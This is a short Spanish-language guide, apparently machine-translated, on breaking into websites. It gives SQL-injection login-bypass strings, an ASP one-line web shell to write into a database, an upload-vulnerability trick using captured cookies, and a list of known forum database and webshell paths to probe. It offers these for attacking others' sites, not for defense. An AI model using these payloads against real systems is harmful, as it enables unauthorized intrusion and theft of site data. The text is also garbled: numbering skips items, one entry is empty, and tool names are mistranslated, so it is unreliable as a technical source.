¡Cómo invadir un sitio web designado!

Primero, observe el sitio web designado.

La intrusión en un sitio web designado requiere condiciones:

Primero debes observar si el sitio web es dinámico o estático.

Si es estático (.htm o html), generalmente no tendrá éxito.

Si el sitio web objetivo a invadir es dinámico, puede utilizar las vulnerabilidades del sitio web dinámico para invadir.

Cita: Los siguientes son métodos comunes para invadir sitios web:

1. Vulnerabilidad de carga Si ve: Seleccione el archivo que desea cargar [volver a cargar] o "Inicie sesión "usar", ¡el 80% tiene lagunas!

A veces, la carga puede no realizarse correctamente porque las Cookies son diferentes. Tenemos que usar WSockExpert para obtener las Cookies y luego usar DOMINIO para cargar.

2 Vulnerabilidad de inyección causada por lax. filtrado de caracteres

3. Destruya la base de datos: reemplace / en el medio del directorio secundario con %5c

4. estar conectado a SQL Puede ingresar al fondo directamente. Lo recogí. Los similares incluyen:

'or''=' " o "a"="a ') o ('a'='a ") o ("a"="a or 1=1 - - ' o 'a'='a

5. Todos sabemos esto

6. Escribir en la base de datos en formato ASP 〈%ejecutar solicitud("valor")%〉. (la base de datos debe tener el sufijo de ASP o ASA)

Por ejemplo: base de datos predeterminada, dirección de fondo predeterminada, contraseña de cuenta de administrador predeterminada, etc.

8. utilización: existen muchos sitios web/WEBSHELL que benefician a otros.

/Databackup/dvbbs7.MDB

/bbs/Databackup/dvbbs7

/bbs. /Data/dvbbs7.MDB

/data/dvbbs7.mdb

/bbs/diy.asp/diy.asp/bbs/cmd .asp

/ bbs/cmd.exe

/bbs/s-u.exe

Herramienta: sitio web Hunter Digging Chicken Ming Boy